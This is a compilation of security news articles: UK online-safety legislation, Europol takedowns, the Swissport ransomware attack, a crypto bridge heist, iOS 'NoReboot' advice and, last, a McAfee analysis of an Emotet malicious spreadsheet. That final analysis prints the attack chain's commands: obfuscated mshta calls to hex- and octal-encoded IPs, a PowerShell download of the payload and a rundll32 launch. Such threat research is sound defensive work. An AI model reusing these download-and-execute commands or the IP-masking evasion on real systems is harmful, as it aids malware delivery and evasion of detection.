UK Adds New Offenses to Online Safety Bill

Read Time:3 Minute, 22 Second

UK Adds New Offenses to Online Safety Bill

The UK government has unveiled plans to strengthen its Online Safety Bill, which includes the creation of new criminal offenses.

The legislation, first drafted in May 2021, will place new obligations on social media sites and other services hosting user-generated content or allowing people to talk to others online to remove and limit the spread of illegal and harmful content. This includes child sexual abuse, terrorist material and suicide content.

The UK’s communications regulator, Ofcom, will be responsible for holding these firms to account, with the power to fine those failing to meet their duty of care up to £18m or 10% of annual global turnover, whichever is higher.

Digital Secretary Nadine Dorries has now announced that three new offenses relating to abusive and offensive online communications will be included in the bill. This followed a review by the Law Commission, which concluded that current laws in this area have not kept pace with the rise of smartphones and social media. The new offenses are:

A ‘genuinely threatening’ communications offense, where communications are sent or posted to convey a threat of serious harm. This will combat online threats to rape, kill and inflict physical violence or cause people serious financial harm. This is particularly designed to protect public figures such as MPs, celebrities or footballers.
A harm-based communications offense to capture communications sent to cause harm without a reasonable excuse. This offense will be based on the intended psychological harm towards the victim by considering the context in which the communication was sent. It is hoped this will better tackle abusive messages towards women and girls, which may not seem obviously harmful when considered on their own. It is also designed to avoid criminalizing communications sent with no intention to cause harm, such as consensual messages between adults.
An offense for when a person sends a communication they know to be false with the intention to cause non-trivial emotional, psychological or physical harm. This will cover false communications deliberately sent to inflict harm, such as hoax bomb threats, instead of misinformation where people are unaware that what they are sending is false or genuinely believe it to be true.

These offenses will carry different maximum sentences, including up to five years in prison for threatening communications.

Professor Penney Lewis, Commissioner for Criminal Law, explained: “The criminal law should target those who specifically intend to cause harm while allowing people to share contested and controversial ideas in good faith. Our recommendations create a more nuanced set of criminal offenses, which better protect victims of genuinely harmful communications as well as better protecting freedom of expression.

“I am delighted that the government has accepted these recommended offenses.”

In addition, new obligations will be placed on social media companies to remove the most harmful illegal content and criminal activity on their sites more quickly. These priority offenses include revenge porn, hate crime, fraud, the sale of illegal drugs or weapons, the promotion or facilitation of suicide, people smuggling and sexual exploitation. Terrorism and child sexual abuse were already categorized in this way. For these types of content, social media sites must take proactive action to prevent them from being viewed by users. This is instead of taking down content in response to user reports.

Dorries commented: “This government said it would legislate to make the UK the safest place in the world to be online while enshrining free speech, and that’s exactly what we are going to do. Our world-leading bill will protect children from online abuse and harms, protecting the most vulnerable from accessing harmful content and ensuring there is no safe space for terrorists to hide online.

“We are listening to MPs, charities and campaigners who have wanted us to strengthen the legislation, and today’s changes mean we will be able to bring the full weight of the law against those who use the internet as a weapon to ruin people’s lives and do so quicker and more effectively.”

Read More

European Police Flag 500+ Pieces of Terrorist Content

Read Time:1 Minute, 37 Second

European Police Flag 500+ Pieces of Terrorist Content

European police have found and referred 563 pieces of terrorist content to service providers in the region, as a UK man was jailed for sharing a bomb-making manual online.

The Referral Action Day took place last week at Europol’s headquarters. The EU’s Internet Referral Unit (EU IRU) coordinated the referral activity with specialized counter-terrorism units from France, Germany, Hungary, Italy, the Netherlands, Portugal, Spain, Switzerland and the UK.

In particular, they were looking for content on “explosive chemical precursors” being shared online by terrorist-supporting networks, including jihadists. This refers to content such as bomb-making tutorials and information on carrying out terrorist attacks.

The content found on 106 websites and platforms will now be assessed by the relevant online service providers against their terms and conditions.

Last November, over 20 websites in Germany and the UK were suspended by service providers for disseminating online terrorist propaganda – fewer than half the number of sites originally flagged by police.

However, a new EU regulation will soon give the authorities the power to demand the removal of online terrorist content.

The news comes after a 19-year-old UK man was sentenced to 42 months in jail for sharing a bomb-making manual on social media.

Connor Burke, from southeast London, pleaded guilty at Woolwich Crown Court to disseminating a terrorist publication that contained information on how to create improvised explosive devices (IEDs).

He also pleaded guilty to four counts of possession of a document “likely to be useful” to a would-be terrorist.

“Burke had an unhealthy interest in extreme right-wing terrorist ideology, and this led to him sharing extremely dangerous material with others online,” argued Richard Smith, head of the Metropolitan Police’s Counter Terrorism Command.

“Increasingly, we’re seeing young people being drawn into extremist ideologies, some of whom – like Burke – then go on to commit serious terrorism offenses.

Read More

Swissport Ransomware Attack Delayed Flights

Read Time:1 Minute, 49 Second

Swissport Ransomware Attack Delayed Flights

Airport services giant Swissport is restoring its IT systems after a ransomware attack struck late last week, delaying flights.

The Zurich-headquartered firm operates everything from check-in gates and airport security to baggage handling, aircraft fuelling and de-icing and lounge hospitality. It claims to have provided ground services to 97 million passengers last year and handled over five million tons of air freight.

Swissport took to Twitter on Friday to warn its IT infrastructure had been hit by ransomware and apologize for any impact on service delivery.

However, a day later, the firm appeared to have things back under control.

“IT security incident at #Swissport contained,” it tweeted. “Affected infrastructure swiftly taken offline. Manual workarounds or fallback systems secured operation at all times. Full system clean-up and restoration now under way. We apologize for any inconvenience.”

It’s unclear exactly how severely the outage impacted its many clients around the globe. However, one report from German media revealed it led to temporary delays at Zurich airport.

“Due to system problems at our airport partner Swissport, 22 flights were delayed by three to 20 minutes yesterday,” a spokeswoman for the airport is quoted as saying.

The attackers are believed to have struck early in the morning of Thursday February 3. By Friday, there was no significant impact on operations at Zurich airport.

Backup procedures reportedly kicked in during the outage so that there was no impact on aircraft crews. However, a Swissport spokesperson reportedly admitted: “there may be delays in some cases.”

The news follows a series of attacks and disruptions at European ports and oil terminals over the past week, impacting fuel supply chains at a time of rising prices and heightened concern over the possible knock-on effect of Russia invading Ukraine.

“Whether the surge in attacks is related to current geopolitical events is unknown,” said Andy Norton, European cyber-risk officer at Armis.

“However, providers of critical services should immediately review the adequacy of their risk assessments, with emphasis on the criticality of ancillary IT systems that have increased connectivity, and the potential to impact OT and ICS production and service delivery.”

Read More

Social engineering: Definition, examples, and techniques

Read Time:27 Second

What is social engineering?

Social engineering is the art of exploiting human psychology, rather than technical hacking techniques, to gain access to buildings, systems, or data.

For example, instead of trying to find a software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to trick the employee into divulging his password.

[ Learn what makes these 6 social engineering techniques so effective. | Get the latest from CSO by signing up for our newsletters. ]

To read this article in full, please click here

Read More

CISOs are burned out and falling behind

Read Time:45 Second

The CISO’s text was brief but telling: “I never want an operational role again,” it read, arriving on Jeff Pollard’s phone in December as security teams scrambled to deal with the latest headline-making threat, Log4j.

“He’s an effective CISO with a long tenure, but his mentality was ‘Here we go again.’ He was speaking to the herculean effort he knew he and his team would have to make. No one needed more of that. And it was sort of like, ‘I’m done,’” says Pollard, vice president and principal analyst with Forrester Research.

Most workers—most people, for that matter—have had that I’m done feeling at one time or another; studies today are finding, in fact, that many individuals are feeling overwhelmed and worn down by the pandemic and all the disruptions it has brought.

To read this article in full, please click here

Read More

Crypto Firm Meter Loses $4.4m in Cyber-Heist

Read Time:1 Minute, 35 Second

Crypto Firm Meter Loses $4.4m in Cyber-Heist

Yet another cryptocurrency firm has been hacked to the tune of millions of dollars.

Meter provides decentralized finance (DeFi) infrastructure services, linking siloed blockchains for users with so-called “cross-chain bridges.”

Over the weekend, it revealed that an unauthorized intruder had managed to exploit a bridge vulnerability to mint a large number of Binance Coins (BNB) and wrapped Ethereum (WETH), while running down its reserves.

After halting bridge transactions immediately, the firm investigated the source of the bug.

“The extended code had a wrong trust assumption which allowed hacker to call the underlying ERC20 deposit function to fake an BNB or ETH transfer,” it explained on Twitter.

“The only impacted tokens were native gas tokens (WETH and BNB), and only Meter and Moonriver networks were impacted.”

Meter admitted it lost $4.4m in the raid but said it would compensate those affected while working with the authorities to trace its attacker.

“We urge all the liquidity providers that provide liquidity involving WETH and BNB to remove liquidity from the pool and wait for an additional announcement from the Meter team,” it added. “Please try avoid trading in these pairs as well.”

Meter urged the hacker to return the funds but has not publicly offered its assailant a bug bounty reward for their safe return, as did two other crypto firms compromised last week.

DeFi provider Quibit Finance proffered a reward of $2m to its attackers and a promise not to press charges after they made off with $80m.

Then a few days later, another cross-chain bridge provider, Wormhole, lost an estimated $322m after attackers stole 120,000 ETH. This time it offered a staggering $10m to the hacker.

A few days later, proprietary trading firm Jump Trading said it replenished those funds “to make community members whole and support Wormhole now as it continues to develop.”

Read More

How iOS Malware May Snoop on Our Devices

Read Time:6 Minute, 24 Second

Smartphones have become such an integral part of our lives that it’s hard to imagine a time when we didn’t have them. We carry so much of our lives on our devices, from our social media accounts and photos of our pets to our banking information and home addresses. Whether it be just for fun or for occupational purposes, so much of our time and attention is spent on our smartphones. 

Because our mobile devices carry so much valuable information, it’s important that we stay educated on the latest cyber schemes so we can be prepared to combat them and keep our data safe.  According to Bleeping Computer, researchers have developed a trojan proof of concept tool that fakes a shutdown or reboot of iPhones, preventing malware from being removed and allowing hackers to secretly snoop on microphones and cameras.  

Let’s dive into the details of this technique.  

How “NoReboot” allows hackers to spy on a device 

Typically, when an iOS device is infected with malware, the solution is as simple as just restarting the device. However, with this new technique researchers are calling “NoReboot,” ridding a device of malware is not quite as simple. 

“NoReboot” blocks the shutdown and reboot process from being carried out, preventing the device from actually restarting. Without a proper shutdown and reboot, a malware infection on an iOS device can continue to exist. Because the device appears to be shut off with a dark screen, muted notifications, and a lack of response, it is easy to assume that the device has shut down properly and the problem has been solved. However, the “NoReboot” technique has only simulated a reboot, allowing a hacker to access the device and its functions, such as its camera and microphone. If a hacker has access to these functions, they could record the user without their knowledge and potentially capture private information.  

This attack is not one that Apple can fix, as it relies on human-level deception rather than exploiting flaws found on iOS. That’s why it’s important that we know how to use our devices safely and stay protected. 

How to know if your smartphone has been hacked 

As previously mentioned, smartphone usage takes up a big chunk of our time and attention. Since we are so often on these devices, it is usually fairly easy to tell when something isn’t working quite like it is supposed to. While these things could very well just be technical issues, sometimes they are much more than that, such as malware being downloaded onto your smartphone. 

Malware can eat up the system resources or conflict with other apps on your device, causing it to act oddly. 

Some possible signs that your device has been hacked include: 

Performance issues 

A slower device, webpages taking way too long to load, or a battery that never keeps a charge are all things that can be attributed to a device reaching its retirement. However, these things may also be signs that malware has compromised your phone. 

Your phone feels like it’s running hot 

Malware running in the background of a device may burn extra computing power, causing your phone to feel hot and overheated. If your device is quick to heat up, it may be due to malicious activity. 

Mysterious calls, texts, or apps appear 

If apps you haven’t downloaded suddenly appear on your screen, or if outgoing calls you don’t remember making pop up on your phone bill, that is a definite red flag and a potential sign that your device has been hacked. 

Pop-ups or changes to your screen 

Malware may also be the cause of odd or frequent pop-ups, as well as changes made to your home screen. If you are getting an influx of spammy ads or your app organization is suddenly out of order, there is a big possibility that your device has been hacked. 

Six tips to prevent your phone from being hacked 

To avoid the hassle of having a hacked phone in the first place, here are some tips that may help. 

1. Update your phone and its apps

Promptly updating your phone and apps is a primary way to keep your device safe. Updates often fix bugs and vulnerabilities that hackers rely on to download malware for their attacks. 

2. Avoid downloading from third-party app stores

Apple’s App Store and Google Play have protections in place to help ensure that apps being downloaded are safe. Third-party sites may not have those same protections or may even be purposely hosting malicious apps to scam users. Avoiding these sites altogether can prevent these apps from allowing hackers into your device. 

3. Stay safer on the go with a VPN

Hackers may use public Wi-Fi to gain access to your device and the information you have inside of it. Using a VPN to ensure that your network is private and only you can access it is a great way to stay protected on the go. 

4. Turn off your Wi-Fi and Bluetooth when not in use

Turning off your Wi-Fi and Bluetooth when you are not actively using them is a simple way to prevent skilled hackers from working their way into your devices. 

5. Avoid public charging stations

Some hackers have been known to install malware into public charging stations and hack into devices while they are being charged. Investing in your own personal portable charging packs is an easy way to avoid this type of hack.  

6. Encrypt your phone

Encrypting your phone can protect your calls, messages, and information, while also protecting you from being hacked. iPhone users can check their encryption status by going into Touch ID & Passcode, scrolling to the bottom, and seeing if data protection is enabled.  

7. Determine whether your device rebooted properly

Although researchers agree that you can never trust a device to be fully off, there are some techniques that can help you determine whether your device was rebooted correctly.2 If you do suspect that your phone was hacked or notice some suspicious activity, restart your device. To do this, press and hold the power button and either volume button until you are prompted to slide the button on the screen to power off. After the device shuts down and restarts, notice if you are prompted to enter your passcode to unlock the device. If not, this is an indicator that a fake reboot just occurred. If this happens, you can wait for the device to run out of battery, although researchers have not verified that this will completely remove the threat.  

Stay protected 

If you are worried that your device has been hacked, follow these steps: 

Install and run security software on your smartphone if you haven’t already. From there, delete any apps you didn’t download, delete risky texts, and then run your mobile security software again. 
If you still have issues, wiping and restoring your phone is an option. Provided you have your photos, contacts, and other vital info backed up in the cloud, it’s a relatively straightforward process. A quick search online can show how to wipe and restore your model of phone. 
Lastly, check your accounts and your credit to see if any unauthorized purchases have been made. If so, you can go through the process of freezing those accounts, getting new cards, and credentials issued with the help of McAfee Identity Protection Service. Further, update your passwords for your accounts with a password that is strong and unique

The post How iOS Malware May Snoop on Our Devices appeared first on McAfee Blog.

Read More

Emotet’s Uncommon Approach of Masking IP Addresses

Read Time:3 Minute, 26 Second

Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:

Hexadecimal format: 0xb907d607

Octal format: 0056.0151.0121.0114

Decimal format: 185.7.214.7

This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.

Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee

Threat Summary

The initial attack vector is a phishing email with a Microsoft Excel attachment. 
Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.

Figure 3- Named Manager and Auto_Open triggers

Below are the commands used in Hexadecimal and Octal variants of the Maldocs

FORMAT
OBFUSCATED CMD
DEOBFUSCATED CMD

Hexadecimal
cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html
http://185[.]7[.]214[.]7/fer/fer.html

Octal
cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html
http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.

Figure 4: Process tree of excel execution

The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code

Figure 5- Image of HTML page viewed on a browser

The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:UsersPublicDocumentsssd.dll”.

cmd line
(New-Object Net.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’)

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server

cmd line
cmd  /c C:WindowsSysWow64rundll32.exe C:UsersPublicDocumentsssd.dll,AnyString

IOC

TYPE
VALUE
SCANNER
DETECTION NAME

XLS
06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c
McAfee LiveSafe and Total Protection
X97M/Downloader.nn

DLL
a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3
McAfee LiveSafe and Total Protection

 

Emotet-FSY

HTML URL
http://185[.]7[.]214[.]7/fer/fer.html

http://46[.]105[.]81[.]76/c.html

WebAdvisor
Blocked

DLL URL
http://185[.]7[.]214[.]7/fer/fer.png

http://46[.]105[.]81[.]76/cc.png

WebAdvisor
Blocked

MITRE ATT&CK

TECHNIQUE ID
TACTIC
TECHNIQUE DETAILS
DESCRIPTION

T1566
Initial access
Phishing attachment
Initial maldoc uses phishing strings to convince users to open the maldoc

T1204
Execution
User Execution
Manual execution by user

T1071
Command and Control
Standard Application Layer Protocol
Attempts to connect through HTTP

T1059
Command and Scripting Interpreter
Starts CMD.EXE for commands execution
Excel uses cmd and PowerShell to execute command

T1218

 

Signed Binary Proxy Execution
Uses RUNDLL32.EXE and MSHTA.EXE to load library
rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript

Conclusion

Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

Read More